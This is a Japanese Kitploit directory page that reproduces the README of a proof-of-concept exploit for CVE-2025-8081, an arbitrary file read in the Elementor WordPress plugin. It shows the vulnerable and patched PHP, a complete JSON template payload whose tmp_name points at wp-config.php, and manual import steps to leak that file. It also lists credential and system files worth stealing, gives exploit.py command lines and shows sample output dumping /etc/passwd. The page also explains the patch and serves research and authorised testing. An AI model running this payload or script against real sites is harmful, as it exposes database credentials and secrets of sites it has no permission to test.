Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-8081-Elementor — CVE-2025-8081の概念実証エクスプロイト。Elementor WordPressプラグインにおける任意ファイル読み取りの脆弱性で、認証済み管理者がwp-config.phpなどの機密ファイルを読み取ることが可能になります。 | Kitploit
ツール/GitHubGitHub/lyesh4ck/cve-2025-8081-elementor
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHublyesh4ck/cve-2025-8081-elementor

CVE-2025-8081-Elementor

CVE-2025-8081の概念実証エクスプロイト。Elementor WordPressプラグインにおける任意ファイル読み取りの脆弱性で、認証済み管理者がwp-config.phpなどの機密ファイルを読み取ることが可能になります。

リポジトリを見る
10ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-8081 - Elementor 任意文件读取の脆弱性

Severity CVSS WordPress Elementor

Elementor WordPress プラグインにおける深刻な任意ファイル読み取りの脆弱性。認証された管理者が、Web サーバーがアクセス可能な任意のファイル(データベース認証情報を含む機密設定ファイルなど)を読み取ることができます。


📋 脆弱性の概要

CVE 情報

プロパティ値
CVE IDCVE-2025-8081
タイプ任意ファイル読み取り (CWE-22: パストラバーサル)
CVSS スコア4.9 (中) - 実際の影響: 重大
CVSS ベクターAV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
影響を受けるバージョンElementor ≤ 3.30.2
修正バージョンElementor ≥ 3.30.3
公開日2025年7月22日
開示日2025年10月15日

攻撃に必要な条件

  • ✅ WordPress 管理者アカウント
  • ✅ Elementor プラグインがインストールされ有効化されていること
  • ✅ テンプレートインポート機能へのアクセス
  • ✅ 画像 Elementor ウィジェットが有効であること

影響

  • 🔴 任意ファイル読み取り: Web サーバーユーザー (www-data) がアクセス可能な任意のファイルを読み取る
  • 🔴 認証情報の窃取: wp-config.php へのアクセスにより、データベース認証情報とセキュリティキーが漏洩
  • 🔴 データベース侵害: 窃取した認証情報を使用した WordPress データベースへの完全なアクセス

🎯 脆弱性の詳細

場所

この脆弱性は単一のファイルの単一の行に存在します:

root@kitploit:~
elementor/includes/template-library/classes/class-import-images.php
115行目 (v3.28.3)

脆弱なコード (v3.28.3)

root@kitploit:~
if ( isset( $attachment['tmp_name'] ) ) {
    // Used when called to import a directly-uploaded file.
    $filename = $attachment['name'];
    $file_content = Utils::file_get_contents( $attachment['tmp_name'] );  // ❌ NO VALIDATION!
}

問題点: tmp_name パラメータが is_uploaded_file() で検証されていないため、攻撃者が任意のファイルパスを指定できます。

修正済みコード (v3.30.3)

root@kitploit:~
if ( isset( $attachment['tmp_name'] ) ) {
    // Used when called to import a directly-uploaded file.
    $filename = $attachment['name'];
    $file_content = false;
    // security validation in case the tmp_name has been tampered with
    if ( is_uploaded_file( $attachment['tmp_name'] ) ) {  // ✅ VALIDATION ADDED!
        $file_content = Utils::file_get_contents( $attachment['tmp_name'] );
    }
}

修正内容: パッチでは is_uploaded_file() 検証を追加し、tmp_name が正当な HTTP POST アップロードファイルを参照していることを保証します。


💣 概念実証 (PoC)

JSON ペイロード

root@kitploit:~
{
  "content": [{
    "id": "s1",
    "elType": "section",
    "settings": [],
    "elements": [{
      "id": "c1",
      "elType": "column",
      "settings": {"_column_size": 100},
      "elements": [{
        "id": "w1",
        "elType": "widget",
        "widgetType": "image",
        "settings": {
          "image": {
            "url": "http://x.com/x.jpg",
            "id": 1,
            "tmp_name": "/var/www/html/wp-config.php",
            "name": "leaked_config.txt"
          }
        },
        "elements": []
      }]
    }]
  }],
  "version": "0.4",
  "type": "page"
}

手動による悪用手順

  1. WordPress に管理者としてログイン
  2. Elementor → マイテンプレート → テンプレートのインポート に移動
  3. 上記の JSON ペイロードをアップロード (payload.json として保存)
  4. 今すぐインポート をクリック
  5. メディア → ライブラリ に移動
  6. leaked_config.txt を見つけてダウンロード

結果: データベース認証情報を含む wp-config.php の内容が漏洩します!


📊 窃取対象となる注目ファイル

重要ファイル

ファイル説明影響
/var/www/html/wp-config.phpWordPress 設定🔴 重大 - DB 認証情報
/proc/self/environ環境変数🔴 重大 - API キー、シークレット

高価値ファイル

ファイル説明影響
/etc/passwdシステムユーザー🟠 高 - ユーザー列挙
/var/www/html/.htaccessWeb サーバー設定🟠 高 - 設定情報の開示
/var/log/apache2/access.logApache ログ🟡 中 - 情報開示

🛠️ 自動化された悪用

クイックスタート

root@kitploit:~
python3 exploit.py -t https://target.com -u admin -p password123

コマンドラインオプション

root@kitploit:~
必須引数:
  -t, --target URL        WordPress ターゲット URL (例: https://target.com)
  -u, --user USERNAME     WordPress 管理者ユーザー名
  -p, --password PASS     WordPress 管理者パスワード

任意引数:
  -f, --file PATH         読み取るファイル (デフォルト: /var/www/html/wp-config.php)
  -o, --output FILE       出力ファイル名 (デフォルト: 自動生成)
  --insecure, -k          SSL 証明書の検証を無効化
  -v, --verbose           デバッグ用の詳細出力を有効化
  -h, --help              ヘルプメッセージを表示

使用例

root@kitploit:~
# 基本的な悪用 (デフォルトのペイロードで wp-config.php を読み取る)
python3 exploit.py -t http://target.com -u admin -p password123

# カスタムターゲットファイル
python3 exploit.py -t http://target.com -u admin -p password123 -f /etc/passwd

# HTTPS と自己署名証明書を使用
python3 exploit.py -t https://target.com -u admin -p password123 --insecure

# カスタム出力付きの詳細モード
python3 exploit.py -t http://target.com -u admin -p password123 \
  -f /etc/passwd -o users.txt -v

# OrbStack/Docker からホストマシンをターゲットにする場合
python3 exploit.py -t http://host.internal:8080 -u admin -p password123 -v

期待される出力

root@kitploit:~
Kali:~$ python3 exploit.py  -t http://host.internal:8080 -u admin -p admin123 -f /etc/passwd

======================================================================
 CVE-2025-8081 - Elementor Arbitrary File Read
======================================================================
Target: http://host.internal:8080
File:   /etc/passwd
======================================================================

[INFO] Attempting WordPress authentication...
[SUCCESS] ✓ Authentication successful!
[INFO] Fetching AJAX nonce...
[INFO] Loading payload: payload.json
[INFO] Uploading malicious template...
[SUCCESS] ✓ Template uploaded successfully!
[INFO] Searching for leaked file: leaked_passwd.txt
[SUCCESS] ✓ Found file: http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
[INFO] Downloading file...
[SUCCESS] ✓ Downloaded 839 bytes

======================================================================
 EXPLOITATION SUCCESSFUL!
======================================================================
File URL:  http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
File size: 839 bytes
Saved to:  leaked_passwd.txt

--- FILE CONTENT (first 500 chars) ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin
--- END ---
======================================================================

⚖️ 法的免責事項

教育目的および許可されたテスト専用

このツールは、セキュリティ研究および侵入テストの目的でのみ提供されています。事前の相互同意なしにターゲットを攻撃するためのこのツールの使用は違法です。

適用されるすべての地域、州、連邦の法律を遵守する責任はエンドユーザーにあります。

  • ✅ 所有しているシステム、または明示的な書面による許可を得たシステムでのみ使用
  • ✅ 責任ある開示の実践
  • ✅ 教育および研究目的
  • ❌ 不正アクセスは違法であり、法律で罰せられます
  • ❌ 著者は誤用に対する責任を負いません

このツールを使用することで、法的かつ倫理的に使用することに同意したものとみなされます。


最終更新日: 2025年10月17日

ツールをダウンロード